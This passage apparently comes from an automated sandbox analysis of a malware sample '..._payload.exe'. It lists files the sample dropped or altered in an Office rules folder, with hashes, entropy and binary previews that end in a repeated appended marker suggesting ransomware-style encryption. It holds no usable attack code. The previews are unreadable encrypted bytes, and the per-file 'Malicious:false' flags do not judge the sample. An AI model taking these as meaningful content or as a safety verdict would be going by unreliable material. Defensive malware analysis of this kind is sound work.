                                                                                                                                                                      SHA-512:BA79ABAD84F07B3B7AA100A73AA765F06AFFF0B74A5B757DC2DD345AF62D51AA4740953C06FB89AE3902BD9B4E0AE1BF2BE69592735D3A4DF92F56816EEAE2B6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml4.]..g..;5.T.R...~F..\...Sb.....K].NZ.....!....^u].1..H..P.....HJd....W....i8.hI....wB..4*.oZOC.......;...:.z..^...Q:<..,...}....C...(...%.&.c.......>a..K.Jc......T.W..+O.37.....8V@..9.:.#...F..A..........R.........-..We..l..Cg.Ux....8..../..a.n..3.....F..G...L<4.?..l..5.!.u.#.G.!t.>qk..T.....hH..y..zi.z).Ub.S.]...!!p.....!.."....1....3...J...kCB.X....|.....e.$..!.?..f.n.E...Z.(*#....+-.FH,DA.!..k....b..}.<.t.`.R.u.G_.3.......Tt...V.q../<...N..... 7dh.1.....Y....H6..G<.3.L..x..'....'.....o.;F.Dd...v...6.*..D.t.......9.......^....g.i/..I..........l.I|..O.fM....Xx../D.%..7.?..K...o..+..a:..W.Y..l..=...?...[7.g.....$^.S..G.u`.O........d.<K%...G.,.bl.R0o.Q.R"IY.........S.]..}A..'u..C.....?.'...v...Q...j".2....G..#G..1mer....}.$......5u...R....!...=.8........R.h%.B..$.g.y.g......9.d(w.6....M..w.0.Ll..LI.W..x.|.\-..8...H.O ..P..N#...W.8O..q.M@2....92..Ll..g.k......(@ }../..Y..i...Twf.tY.RT.....^.k,c.?.....A...w....S....3.Ny..rT....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270004v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):831
                                                                                                                                                                      Entropy (8bit):7.747856727996511
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:wdpFP2+FEF5uRaow44Wej8GE1oDbkBXWtX5OKkLil/pSHLqoWSUdNcii9a:w/d2+FECIowxrj6o0AOKgiT+2bD
                                                                                                                                                                      MD5:0B814FB390880A65A8EF0586E2FA1317
                                                                                                                                                                      SHA1:EA07D2A4671AA939F4A290295E763433DC646D90
                                                                                                                                                                      SHA-256:204B402A4116076EF68557C25878B5932A02E56B803EBF47D5FC6B8BF4B4F710
                                                                                                                                                                      SHA-512:F253EB6B090C78F25724652C6B32D917FFC3628464E631AD117F30C5DF495B7EAB8ED5216CEF2E0EDAD83F93F7CD67BF0BC701FD2F6EE2CFDD03C016E17BE0E4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.........^..]...\.........r.......".."Z.\.9.t.`.GJ.{e....H?.;......6....C].q......A?Y..@u.rI....qkx.'4*sud..(.l..I.c..."....`h..9....=.4HS.i.m..2.......8.$.+.mg.E...\ .@...<.t..[.b99.:.....w..0....@.R.Q.....oLB+";..C....F.z.....6{...G=f:_.g;..|%s....F..|.b.&...j..7.._...:)...f.gD/...i.s7?..f.K...........%[.q.zR..k.j..t\m..g.l....B.Z<....>..*._"}.'..W.$.>:......."M.0...L..n..L%5DG..m...,...r?*..A.WK.l<..&..a....uKp>F....E..ni.wPYM1.,.k........R........\1k........Jp'i.O-.L.E_..;..o\...u...{......>l.....>.ni.'....9......Z...:..c......G...J.^...p..t...v./4==Th........%.......B,1..O{.=6{....u.Cq*...r+2$.#.......*.C.,o...'..]mUk~_....b..I7...&-.......uM....Xh.....jm.7.....+}.Q....W.1<QM.........c...G..LmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270005v4.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1485
                                                                                                                                                                      Entropy (8bit):7.872626449681533
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:GbeRiB7JscM75Pnw+2XCaNZPRuqdmgQLqJJOAmrgL8WmnuiS/R9NJ9l+f5W3c8iz:yeEB7icIhw+2XCaNZN1QLqJodsL8KiCC
                                                                                                                                                                      MD5:5B826640AAD221DB09D48D6584291954
                                                                                                                                                                      SHA1:49536C58845E4F6F61067D646068ADD2384342D2
                                                                                                                                                                      SHA-256:96E265B6DFE3512CAC5B33D0F200D9F3A84F5F6BED1944E40E660F92CB879A6C
                                                                                                                                                                      SHA-512:2EC505FD5DD18D0661A8101420EAFFBAC30557183F1BE3498B97116B7F2C1FF0FA35699E3A9FCA4ACF5A576F7826074664FD152F8AEB19E599844303C5B0A121
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...z..2.....(a.(48......q.v..f.k .):.x./.`......._./%...L..<.6.8.J%....,..Zf`T...#~."........#<%^.{7/!...w..ru.z..>1.p..X..........@.q-.T#K.Jx.}-%...$&Q.Rd.z...M....q..Ua1..{$..=...*4...S.q...`...T..oK@.......J..v...e..M..6$.A^.j99.=2....X.....\...L..{e"..>.....X..k..Ky.w.B9=....y..t...y n..%'.h.Jq.W.2y...`l...t%.:.H..3...mu..:.H!xx_..ab. r4;.A2..0..a.A..)AXr.P.wv..W....?...ec...\I..t$]!....w$.5n..[........d...SXDx...)...N.i.C4..#.'...5...F.Y..T..R..CT1O.5e.yv.d.b....Nu..WO......./@.4..8).RC.8T....a.76.B.x../z..'..Q.x.f.k..G.............B..]....#...q...^?.W...%......].y.=.>xh.F.i.[.2:.i..q[@......%q.$.g...].r.u...6GZ..y.'i.Ur:N..7.....&...8....n.<....g..@a......z....A.w..S.f[......6...0...E.2k....o..ya...t..}...c....oq+.s.*.K..Z.L.Xq.....+dB..%I......p.......>i.LF...dn.Z4pwA.&Un.k.s.........&x.)..hW6.U..l.....<..e.c.9...e..h..Z.&....>../..k..a..4`._...i..9SR.H..Fl..T.G..%S....K..Ps..?.2..L..^.E...~ah.H..0......

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270006v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2088
                                                                                                                                                                      Entropy (8bit):7.89255601947015
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Up76vItG7NGJ67dxdngMaNM6f2pUTwsjf0v8qQD:UpuvAvYz19Up+Lsrr
                                                                                                                                                                      MD5:7B03AD2D90FB2C418E44CE95101E2C00
                                                                                                                                                                      SHA1:18FE26CC867401450E67C792B4B1FF894C08467B
                                                                                                                                                                      SHA-256:45417A7260F24B9AD3D947AB52A48C7352230239EC64751D5231450446CA8FDD
                                                                                                                                                                      SHA-512:F5A5E09D43527DA3F87DD67C2AF935D654611ACBCAA89984182575494EE37E88D2166CA67B4B20073E2DBF25B6DDDCB32D47AB8AEADD091482E566BD5C1E54BE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.Rz+it.....5.+vH.7[..,.Pg...MZ...}z.Hn..<....J.....\.Q....0S@.~N........ey.x*...+.....n...N..0...\....q....^e.`...Hh}{...kr..3&.m.k..[.hh.s3.9........zA...J.W8Y#O$..i ...l."9....Q4......;%.E+_............V....#....l;.XH.C@,*.F.....e..He...X.. ...e.....M..1..g....1.B.+6!L7.D.{c(Y.......)..../..x.I.<wd..~..BT...j.j...#._..5J..Y..6.....;AM..$$...4..H.N....va.]`..?......k..|(..m..y.7j...@..$..-.r..?.......,/...7N..OsQ.0.L.......t.iln........b...q!.6...Gh.>..4....{..9..{>...7..1.......R..a,.lN.9.4....D...m.(.....@..}*.D..=./....qO....|.M....O..#....|.VE...../.....u..8.....L.....&.......xNnM..E.T.....;Pm.s.~.D.x....T}..,.~...v...e..+Y.$.Fr......M.c.)a../..K7..e.;...]...3.^....+..Cz?;......k?.....F.Y1..0..L.4{.f....nq../........JwGX.jmV?TGj........%3sF>..R....<..6E@.F....Ct(..).g...8g.. _]T..C...mA:..qn.c......&o2.xd....-R.rE..&....;k-ZTE...f..9..p..T55.. .A......q..l.V6.$.....;...!...Z....o....3.R..}.i.pyXV.)~L..d99.T...;....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270007v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):761
                                                                                                                                                                      Entropy (8bit):7.739383627206128
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:kR8W5liCiTGpnHl5MRdiwBLq6F7lIgcu/1m++JODBBt7Wo/eTpd85RCDwMSUdNcq:kRz5liCiTGpnnMbiwB2Vu/D+J+B+o/Fg
                                                                                                                                                                      MD5:D0BF53E950B9B93340F7981857D0EC38
                                                                                                                                                                      SHA1:A9722A3D6F49DE876288848BC8082F472A992266
                                                                                                                                                                      SHA-256:53B657F110E3B2A154A24B336E35DF4D771BAAC77C510E1D16F22EF49765DB35
                                                                                                                                                                      SHA-512:E4B1F62BDD7D48CF422EEB2822EEAF7D14D161ABCF2785747DD0A8AD9966AA105842D1A86E09C779991CE5486062293E6B940429DA77951399AFDC497519E0AF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlw..=.^..G,R.jh$..}.k..T./...k_z....P\...Rn...k=.......g....!<.,..-..|.A......(..:.G.M...<..y..-..5t.B.4..1.[;.d.....=}..sD..o..D"..X...4F.]....r.2.....T...cX..Y.....;?.~.....6.h..4./9..S..3....-.a..Z*3g... .zP|K..p..![....\..........7.8....G>...tbO)<R..WT..=...@.).QT.yb'.+...xXeF......+..<]....)..2F....K.v.l.fB]y.c":......8nD......2.s.g.E..ly.. ....-;.7d.z..:.,..A.....k.o..Nz....../.e..Fa8...K.Ew .R%..:.i#^v[.q l+b...}..*.$c.!...G=.../.i....*.-"P..\..2E. fH.~vDwXg^..2g&6.9.~..._B..(CI....i.L.:...sn....=6....v..$.......k.....o...E.rI.(0.:..W@.y..g......b..h.r...1.I...#.3.$+......WCI...>..g.j.S.........$Od..%......1...#.I..'.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270009v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):854
                                                                                                                                                                      Entropy (8bit):7.747843365257397
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:VAkc3Ihl9Ra8bFjY+Y0p305fFUED3HW8bgIQTJSrQSo5+QZuYkODZbq2pGp1bJgS:VXugO85BQ53HWR0rTc0mZ+2pu6T2bD
                                                                                                                                                                      MD5:6ACABAB2FACD5A938967C3E1FC00AA57
                                                                                                                                                                      SHA1:CA0B24A5ABA7A7F401B5F5BC39D6729E775581E9
                                                                                                                                                                      SHA-256:31C03B9EF495F0F7155FEFBAFC00198578F04F61378AA03985B263914DB97BBB
                                                                                                                                                                      SHA-512:0AF57DA0F81967BB724898D0BBB871DCB4FD9D6147F503D1F42F3D7AC582416C4A20995591667295D555B16CF16A8B10C69F29537A9C2275AABBA08F4185501D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml6Q-.,.:.].4ye'Z...2*M..h.c._.)..._...$.G.C.........m..+#.;5WN.'..=...!`.......,K.[..{.{C..a.D"..._.tc.c...jz...&+^%'^..]......c...&+...7.g.1..[.@.\V........4.......mv..Y...{n`R....Rh...s.gF...l'..].sn.. .-.8...j..2]F..g.<.#(.a.%z.Z7....<......$......7...._.9....^m...K.|...&.at.>L.e1.>.'......a.G.a.d....Q.KHf".K.......G....q...#...c.&..>TeId.A.&...i.R...pf4u.....x.f..{...g@...3..P....1:...}T..$7.j.B..%..`.r.(.(...9:.{k.b|....NPj..^..2.c.@TX....kq....4b.e..5./s.!.1C...L.h*.P..D.....Rb.9.C.3.,_Ph..a...V.....\..... ...Wy9...f.|8O.....0Z...)....&1>.;.|0#^..5.....!.8+^=k%.i...6:w..q..$.c.z.....X.5.w..J.`...FE.}.z...r_..L...A....w..Rj6..cH|..C*.H......6G.@.w..c..==...lB.~..h...r..-Y..j4<Z{M..;...../..'&.}...Bq.d..{v.d..T...]...+.CmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270010v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1612
                                                                                                                                                                      Entropy (8bit):7.871630609291843
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:40C/UCnauokgm9Qpj2EU8M31QU07NCAiuqkC/VKfD:4YUvr82XbQUGNCXFhW
                                                                                                                                                                      MD5:4B9A49724E70711DFE2547694172F67F
                                                                                                                                                                      SHA1:B366F56544B50DBBC6D126DC47A503AA1D7C1E7C
                                                                                                                                                                      SHA-256:0C59E321EB1EAA6643340E2BDF9B6CDA690586A0A3CC12F427C206362B4F4164
                                                                                                                                                                      SHA-512:911AD76BC5E612524CB4186803F780C31925C531288E9299148E07BB115D82FEF68BA2BB09B019C2FE59A63E61D3D24921063D9445AA2C216C0D09BFE6B6B223
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.jYQR...0.e.Tp...O2.i.DN...uM.Q..]..)..lZ".O.....?.+.....f..AWb...`1..TV..d..Jf...!...B.'....d>......."...U.r......Y../7....<B./...c.f_.t+..{'.V...9.x..Db..,l.k..%..f..B.J.$.G.........tv...M7......jfP..c,.,T....a......J.L....!..L.k...1. ...!.~.CED>_.".n....n"I.K..JpC....N.0..9t.;..El.......S.Uj[O..P.o+F.....F..53.f......VE3......re\o.&.;.U...g....s....X....;q.s.z.m....7../x}x.L.'.$...".!...+.a.t-..`".m.D.....o7|.......&3Q..Qt..u..Que../.....`.D..........:c.\.......I%fh..D..b..J...G.3...lq...U.&..>.bPw...[F....W.....u..MvF.....t@...O...l&...n..4.z.@X}Q1{;.......z5pu%..q."&t. ...g.<z.!.....8..........\.......U.|..&..{...`.{3.6.s....f..........<q.6.......9.D.77.k....+.2..uGZ.t.a:f.......w..5.mm.`V...M.ZY..sh.;..M.....A>...z.s....I|^.yf......^{......K.>.........U....N....H..xr<.G......1v......hTT|G.K........ .C]..o....5@D;.?U....l.E9}.1.P-wdj..-B\.>..=..5.&...O *...=...sn......T....^.c.q.M.M%..V..l.}.f.I.......M^...p7.........rBh.>...K.....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270011v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):747
                                                                                                                                                                      Entropy (8bit):7.699366540779505
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:uLdKetHDt09W+S7KNoiNkmHm89oKQbkT1RNt4esThYgvHSUdNcii9a:uztjt09WFnrcT1PWesT2x2bD
                                                                                                                                                                      MD5:0277D5A792CB93EF972739E52EBD2444
                                                                                                                                                                      SHA1:0303A28FFA6C98D9CB397F8CFAB24D128DE067C3
                                                                                                                                                                      SHA-256:BDCD46B1D09C1ABDD238A536D9D91E1C3C7E06B719ACB2BEE71658D6D3855D6F
                                                                                                                                                                      SHA-512:569FA050D1E6502BDD8F646D06502511BA2832636D4FB667087EDC217BFB743DB243A16B8DE7B4A877517FD94B7EED3625B3E5BE103450B66D7A34947FE32851
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml2}.Q..........h3k.X|..Z.>...).w.9..k..l...fM.X.#^.5...W.M\.$...I*....2..l.;P`p.......n........Q..4..&.......)-...&:KB.7.A.........`fXW....Q.U.....u...D.X.\&.J...I.......7@.d..&.$..."...dj..t..QL.M....8....UR7t.z.p9..I.o_.)...n...r{.5.....K"..l7.6....0w......i...J.>.x|.`...........-.(..4.s..........}...{.E...ZK..=a.....q^R..A.....g.l7=....K..XH).Y.<.0.d.WA..T.|.(w....F..#......Ij.p3..}sNo1D.:aVl%.....~+hH.=...,....|W....?..+P...[...EP.....e..0.....4..........o.6C/.E.H....Ch.y.8..v..v......=.*@.L3.(..'.sC+...t..:..A".......}........y.f....~{N+....8..$J>P..[...AT..Y...).r.h...(.xh.....l7.p..&.E....N.P.*.,...;..u....\....k#$..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270012v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):742
                                                                                                                                                                      Entropy (8bit):7.679270634082616
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:Q9NErcDoL4tw4NyuofMf//wrSNvPCX5lQCj9jrQESQTHHBlSUdNcii9a:EEh4t5NOfMf//wrs305WCj9wE/HhI2bD
                                                                                                                                                                      MD5:3630CEAD6ED682AAAA56021B6C16B972
                                                                                                                                                                      SHA1:39F6907AD7ABB2460FC8598F6B49550745C2B5E9
                                                                                                                                                                      SHA-256:CC352CF03F85F190DA3B71AC2035DDC7B91EFEED5FCB85DEE68ECF0C4F976C3B
                                                                                                                                                                      SHA-512:9B8B987213C1C63255CF539020327F479FDC28AFD326E943077525B7AB0A6530E753A6965B1E466D0C710F1AB73DE5835C1A1843EB033B6D33A64CBAF6746F9A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlP..*oc.|.Q'.qD5^.4..b.k%0I..Q..]..P.f.R.-<z2.;...d.....(7I.:.# .Q...5.z...i..........D.......... ...........%{i..M.P....uR...X1...L........"............{....?q&...`..Z@....:G....H.O;.G...3..l.....`|......Fq..|:E..;vf..:(..3.i.#.j!..z...).JSHR.......s0.t.zC.8(}T..}N^_..fv.....seE.X.A.@u/.!d....{.L<.0}<..e....g|j.Bb...WZ.|....e.0....=`+..SwG..P9,.P>..X/e.t.^)f..B....7qY.1.p.7..&.1KgR{.(S.X5..6.....#.B...:Z..w...+. .l...9....$....p?.f.i(....eq..7......T.....+....F?..U....7Z....)...)...[,."HC.3..!,.^d5...!)x...).5.|Cc,...E..z.,e..$F.Pd..F....d....b..~x..3..A...(.!....v...."B..1.(....#b.b...P..8........Jx..Q.G-...i.(....q%.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270013v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):756
                                                                                                                                                                      Entropy (8bit):7.740409586416132
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:LgSnHP+E+DZbjU/yBTaBTgcNgudFte7Dx5GuWeUidWK+oSSH3dXWSUdNcii9a:ESHP1+FjuhdNgOHIaHeU+WZSdV2bD
                                                                                                                                                                      MD5:185B0D5C7EBA837785DD422AD87769BC
                                                                                                                                                                      SHA1:2468192AC18152FFF36CF2765639BE44A315484E
                                                                                                                                                                      SHA-256:86E5317A50BA2BB3E0DF633C2CACF7407827370AFD0F103E5252F91D40F2677D
                                                                                                                                                                      SHA-512:DB12E7380625D73D8BE0B404E57784B92107C12BCDA74FECA7E8A60686A2E664B3A4A9DFAFEB9A03C6CC40C1A148FB00176A7492F23449C25864E06B4E376889
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.2A....O~.....(&Y......Z.....pKs.C.k..bCL..G.......I?.....U..+.....Z....$.1L.x...8....n....Wh...5..g..`.{.6Y.....s..pZ....&Cl<....&*......p#L..zd.A....s@....,...)...(.C....5..x.?..H.z......3J.....!...}.k|#..-2I.=...N^.R..g...7o..!..........1.nq.....u@n.7a.f....v....i...D.l.F..h..x....Z.....9.l.QN.}.xU.i.8...\....d:.Xe....7....Fj8.....<l.r..$.JC.;..ik."F7..5...Lhxj.+.Ka...?(0..Y....U2.5....~Dg{.F....n..}.j../CL.\.m..[^F.v....B....1...'.....H...eI...v........:./....q.....5r'.h.y'......aL9?f..J..'..^.....i.i.4.c.9).st.#....m..\..y........."..u..^..A.....v..9.n.Q:m........6>).O..(37k...cNM..-./....0l+.g.?=!.pc.j....q?[.v.h.%../..x6....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270014v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):763
                                                                                                                                                                      Entropy (8bit):7.731758150873697
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:mhKL//0nTaMff/Abp/8CnVwIRr+EPqKHwxUVFlpE/itRau2z0+eZwPSUdNcii9a:wU3wTH3obp/5wsSCHwxUVBEKCU/72bD
                                                                                                                                                                      MD5:10795F538748977389F889BCDF41F519
                                                                                                                                                                      SHA1:19AFF51FC1F90F40C2AB385C3CF0EBE59D7554C4
                                                                                                                                                                      SHA-256:02413C3AADCB2C6FE5FF6F1DA169FC9D3F853EBD03CB8ECD22082090678CD979
                                                                                                                                                                      SHA-512:BEAFE42DB721A8158590D2A7D846FCADA369CCDEB08F86DFCD1922B72A82C19A61A1996FF08E6416A1007A1D4622DCB26C68F77CD479352E0EE60D9CCFA2C03A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlB...........I..Z.]...,.......k....d....x?..v_..o.Z--J..b@H$..\..g....]......o3....3[<..E.SO2.<.*.66..w.....".X.q|ii..IH8..f.@.........d..-..%d.W@...C.........u...qj.J9I...`....X..&...).%..L.|.....qF.>|#..\..9...D....v.-}.B5.[a..N.Jq....8..(7...~e...#.........y..\S.d.....r+...N..>..r...#...g2.I..R.o~.*=.".)F....K.z.@[.......^...jA.4.."U.;..WT6..+y6.).B.......#m.G.\..(....4.............`'..'.........HY.D.b+....3...D%b....m.%+O.A8.I.A.,\.[y......XC1.b........*....Ljs[.v.m..d.:...u.......I..m..{b.nz...j.....|. .....o. ......m..K6...5...>;..^h..*w...%.L. R.M...P6..[.......o{.-0,.............3...f9.S. ..9...0...... mSo.y.s)....f'9.<....~)...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270015v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):956
                                                                                                                                                                      Entropy (8bit):7.754823581630593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:kmzR46/lMBqtU+rMAe0ciw35QsI9Tj2NDT7OVuICIo9lp+NVSYW5m+NRqUF6I+Sw:vzC6/lMBWUsLepQr0vvpgSF33nt2bD
                                                                                                                                                                      MD5:33492E4FA65DE1442A59DA4C5247CB7C
                                                                                                                                                                      SHA1:E528A02DCEE004D1F6BF99E4047B323395B5E3CA
                                                                                                                                                                      SHA-256:4ABC8DC00727A3DD1F55812E6021319AEB6DDD9A7246D38C0D153BB5810C577F
                                                                                                                                                                      SHA-512:87710562087323B8F8D13EB925E4C5A115662E712839ACC5D7FDC0591F0ACDA8F95BED93B18011BF5B3CE15B807CB021FFD660F8AF7D819892EAFF64849F25DF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..,..-"..S...q...c....Qz.%p...:...Z.._..-.a:.8C.;DTq.......V......J.#...U......!..c.....q.1L...A:c..y.5#..R".{..c....V..BR.....ci..i..Z.`./.u.e<U.R....A..y.t..Y..D...l).".Z.>p:H.vV..^.....(...8...._...'..S*..p.+..y1En....dA.'<......n...Y....dDFg............E.KWH...d.U...^.-i.-.=.{v. .^>.;..V....-.P@.?[...@....Y)m......J/.4.....=..}.7..[..2.....h..b..{./kc.x...].2(.V@..'..93...$.....=...S.R...i...2..C....r.....q.~.Z.Z...}.fi..C.,.Y..>~.`N.....E....EA.\./..../f,%....Hq...a...1....C..V?....,{>An/E...l..K......A>.a.[...(G..u...h.s.....ju]@'....-_c.o..:OXN.a>L.........b+.{......7_.......4!.W..d|!Z../~rF[.8.K..4...dR..O..,.WhF.c.....X.Qr.9.Z+n.}.h%.[............C.*[.C>..C..;7.*].h.T..".`/.z..T....q...Qy.u.....z....$g..)7...a-..4l6wE..ow..V..}.9.......*...HaG..fpJ..=..$.4......A.0k....7 b9.6...W"C...i.d.n...Fq.?v.j+.4.!.x.y.1....+mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270016v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):837
                                                                                                                                                                      Entropy (8bit):7.725868121173562
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:fYLx42LwVBcVjUpnYObHvZPRVgUMELWKJ9mIPS3iSIaA9GMnmqm1D9yYr7rSUdNX:84+wHjpnYwPTJWKJ9vqyjPXxmlsYG2bD
                                                                                                                                                                      MD5:503CBE1F868EB01F3795DF0B1BADE8CF
                                                                                                                                                                      SHA1:098F02D8A361D5516EDB195D15F3200431E18F64
                                                                                                                                                                      SHA-256:15F6D46DAE249DEF231988560EADB948FF05E285170AB6B29D9130B7D1B78B20
                                                                                                                                                                      SHA-512:B7B27E1CD114A4BE6394B3F2802D18B7690B621BA64EBE71A7E118D6449C0950619896408DA69D049A8AAD5D18063F0552EE48A01595C9A3C89624D70793F045
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.2.b...A......m........X.....Dfhi..:.......4y..b...W4.....$U.......~......C..l)U0./...3...$.EK....[.....`..B..4j....m..R.?.o.>z.M..|....3....^....i..n.-....b.V..D.....C.............)...-..@....1..M..|B..9T36T~.N..k....tq.C..V...........&.G(..Q.4&.C."......m.!..G.<.....{2...a...m<.i..".`^.g....4|pg.X.......S..W.Z..x...;/TAF..!F!...N..r,.DV...V.4O....s.FzJ]U...g..D.*Kyj......0M)YZ...pb..`6.......3.hq..s....g.7P...%...d.t...*...?.G..........I....o-$y...h.Z.p90]......1L'...6U#..".K.^{#&a.Y.K........V.6..............>r.Do.KIV.Q.biO....D...|...Wc.....Q....F.......m...."s....@.l...EYQ.q....6..v...V.....Z..r...Y&t..........XX..YM[.Tj..R...U.j...#.;...!.H.i.....7..j"R.....}Y).H.,.h..\.g..~..&AH.7..1.L.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270017v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
